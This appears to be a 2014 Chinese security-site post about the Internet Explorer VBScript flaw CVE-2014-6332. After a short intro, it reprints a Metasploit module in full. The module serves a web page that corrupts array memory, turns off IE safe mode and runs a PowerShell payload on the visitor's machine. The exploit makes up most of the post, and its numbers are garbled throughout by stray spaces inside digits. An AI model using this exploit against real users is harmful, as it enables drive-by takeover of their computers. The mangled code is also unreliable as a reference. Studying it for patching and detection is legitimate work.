IE remote code execution vulnerability CVE-2014-6332 — test method — vulnerability warning — the black bar safety net

2014-11-18T00:00:00
ID MYHACK58:62201455961
Type myhack58
Reporter 佚名
Modified 2014-11-18T00:00:00

Description

Win95+IE3 through Win10+IE11: remote code execution vulnerability affecting every version

!

Microsoft's security update this month (MS14-064) fixes an IE remote code execution vulnerability, CVE-2014-6332, that has potentially existed for 18 years; you could say it is a big remedial pill for Windows. The defect is in the VBScript code and has been present ever since Windows 95 was first released 19 years ago. Details: click here

Testing with the Metasploit Framework

All IE versions are affected, but because the exploit bundled with msf invokes PowerShell, the Metasploit Framework module only takes effect on systems that have PowerShell installed. The victim machine we test against here is a Windows 2008 host.

This site offers security tools; the procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only — use at your own risk!

msf code:

This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core' require 'msf/core/exploit/powershell'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Powershell

def initialize(info={}) super(update_info(info, 'Name' => "Windows OLE Automation Array Remote Code Execution", 'Description' => %q{ This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability. Internet MS-1 4-0 6 4, CVE-2 0 1 4-6 3 3 2. The vulnerability exists in Internet Explorer 3.0 until version 1 1 within Windows95 up to Windows 1 0. }, 'License' => MSF_LICENSE, 'Author' => [ 'IBM', # Discovery 'yuange <twitter.com/yuange75>', # PoC 'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit 'Wesley Neelen <security[at]forsec.nl>' #Metasploit ], 'References' => [ [ 'CVE', '2014-6332' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'DefaultOptions' => { 'EXITFUNC' => "none" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "November 1 2 2 0 1 4", 'DefaultTarget' => 0)) end

def on_request_uri(cli, request) payl = cmd_psh_payload(the payload. encoded,"x86",{ :remove_comspec => true }) payl. slice! "powershell.exe "

html = <<-EOS <! doctype html><html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body><SCRIPT LANGUAGE="VBScript">

function trigger()

On Error Resume Next

set shell=createobject("Shell. Application")

shell. ShellExecute "powershell.exe", "#{payl}", "", "open", 1end function

</script><SCRIPT LANGUAGE="VBScript">

dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray

Begin()

function Begin()

On Error Resume Next

info=Navigator. UserAgent

if(instr(info,"Win64")>0) then exit function end if

if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else

exit function

end if

win9x=0

BeginInit()

If Create()=True Then

myarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)

myarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)

if(intVersion<4) then

document. write("<br> IE")

document. write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end ifend function

function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=1 3+1 7*rnd(6)

a3=7+3*rnd(5)end function

function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 4 0 0

If Over()=True Then

'document. write(i)

Create=True

Exit For

End If

Next

end function

sub testaa()

end sub

function mydata()

On Error Resume Next

i=testaa

i=null

redim Preserve aa(a2)

ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801 E-3 1 4

aa(a1+2)=myarray

ab(2)=1.74088534731324 E-3 1 0

mydata=aa(a1)

redim Preserve aa(a0)

end function

function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+1, 6)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=1 4) then

j=0

redim Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim Preserve aa(a0)

j=0

j=readmemo(i+&h120+k)

Exit for

end if

next

ab(2)=1.69759663316747 E-3 1 3

trigger()

end function

function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000

redim Preserve aa(a0)

redim ab(a0)

redim Preserve aa(a2)

type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=1 0

If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*1 6

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

else

redim Preserve aa(a0)

exit function

end if

else

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

end if

end if

If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If

redim Preserve aa(a0)

end function

function ReadMemo(add)

On Error Resume Next

redim Preserve aa(a2)

ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747 E-3 1 3

ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)

end function

</script>

</body>

</html> EOS

print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'})

end

end
